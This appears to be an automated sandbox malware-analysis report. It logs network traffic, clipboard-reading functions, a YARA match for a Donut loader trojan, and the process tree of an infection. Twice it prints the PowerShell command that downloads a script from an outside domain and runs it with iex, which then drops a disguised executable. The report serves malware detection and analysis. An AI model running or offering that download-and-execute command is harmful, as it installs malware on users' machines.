Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 49681 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49683 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 59824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.16:49780 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 2.18.97.153:443 -> 192.168.2.16:49797 version: TLS 1.2
Source: unknown HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49806 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.16:49807 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.1.33.206:443 -> 192.168.2.16:49808 version: TLS 1.2
Source: unknown HTTPS traffic detected: 51.104.15.253:443 -> 192.168.2.16:49809 version: TLS 1.2
Source: unknown HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 150.171.85.254:443 -> 192.168.2.16:49819 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.255.122.133:443 -> 192.168.2.16:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.213.254:443 -> 192.168.2.16:49825 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.255.122.133:443 -> 192.168.2.16:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.16:49829 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.221:443 -> 192.168.2.16:49830 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49834 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_059F82A0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 16_2_059F82A0
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_059F82A0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 16_2_059F82A0

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Jump to dropped file
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_0481C583 NtCreateSection,NtMapViewOfSection,VirtualAlloc,NtMapViewOfSection,VirtualProtect,VirtualProtect,VirtualProtect, 16_2_0481C583
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_0481C583 16_2_0481C583
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047C055F 16_2_047C055F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047CC402 16_2_047CC402
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_0481D5C4 16_2_0481D5C4
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047ED652 16_2_047ED652
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047F9792 16_2_047F9792
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047F80E2 16_2_047F80E2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047D31C2 16_2_047D31C2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047CA252 16_2_047CA252
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_0480C2B2 16_2_0480C2B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047C5292 16_2_047C5292
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047F8372 16_2_047F8372
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047C2CB5 16_2_047C2CB5
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047FFCA2 16_2_047FFCA2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047C2D5B 16_2_047C2D5B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_04809DB2 16_2_04809DB2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047C2E1A 16_2_047C2E1A
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047C6EFD 16_2_047C6EFD
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047CBEE2 16_2_047CBEE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047C8EB2 16_2_047C8EB2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047C6EB2 16_2_047C6EB2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047C2E8E 16_2_047C2E8E
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047CCF72 16_2_047CCF72
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047C2FB3 16_2_047C2FB3
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047CE802 16_2_047CE802
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047C98B2 16_2_047C98B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047EB99B 16_2_047EB99B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047F9A42 16_2_047F9A42
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047C3A08 16_2_047C3A08
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047CCAE2 16_2_047CCAE2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047CDA82 16_2_047CDA82
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047E0B95 16_2_047E0B95
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_059C15B1 16_2_059C15B1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_059CB570 16_2_059CB570
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_059C148C 16_2_059C148C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_059C54B0 16_2_059C54B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_059C74B0 16_2_059C74B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_059C54FB 16_2_059C54FB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_059CA4E0 16_2_059CA4E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_059C1418 16_2_059C1418
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_059D17C0 16_2_059D17C0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_059F66E0 16_2_059F66E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_059DF193 16_2_059DF193
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_059CC080 16_2_059CC080
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_059CB0E0 16_2_059CB0E0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_059C2006 16_2_059C2006
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_059F8040 16_2_059F8040
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_05A083B0 16_2_05A083B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_059C1359 16_2_059C1359
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_059C12B3 16_2_059C12B3
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_059FE2A0 16_2_059FE2A0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_059F7D90 16_2_059F7D90
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_059EBC50 16_2_059EBC50
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_059E9F99 16_2_059E9F99
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_059C7EB0 16_2_059C7EB0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_059CCE00 16_2_059CCE00
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_059F6970 16_2_059F6970
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_059C3890 16_2_059C3890
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_05A0A8B0 16_2_05A0A8B0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_059C8850 16_2_059C8850
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_059CAA00 16_2_059CAA00
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: String function: 059CEE60 appears 145 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: String function: 059CCBE0 appears 95 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: String function: 047D0862 appears 145 times
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: String function: 047CE5E2 appears 90 times
One or more processes crash
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 1188
Yara signature match
Source: 00000010.00000002.1580409924.00000000047C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: classification engine Classification label: mal100.troj.evad.win@31/120@23/13
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_047C0C6F CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle, 16_2_047C0C6F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 16_2_059FF006 CoCreateInstance, 16_2_059FF006
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4252
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pddfsfas.1ok.ps1 Jump to behavior
Source: C:\Windows\System32\conhost.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1948,i,8122544170802490295,15874759390953772630,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://google.com"
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe "C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe"
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 1188
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 1736
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1948,i,8122544170802490295,15874759390953772630,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe "C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
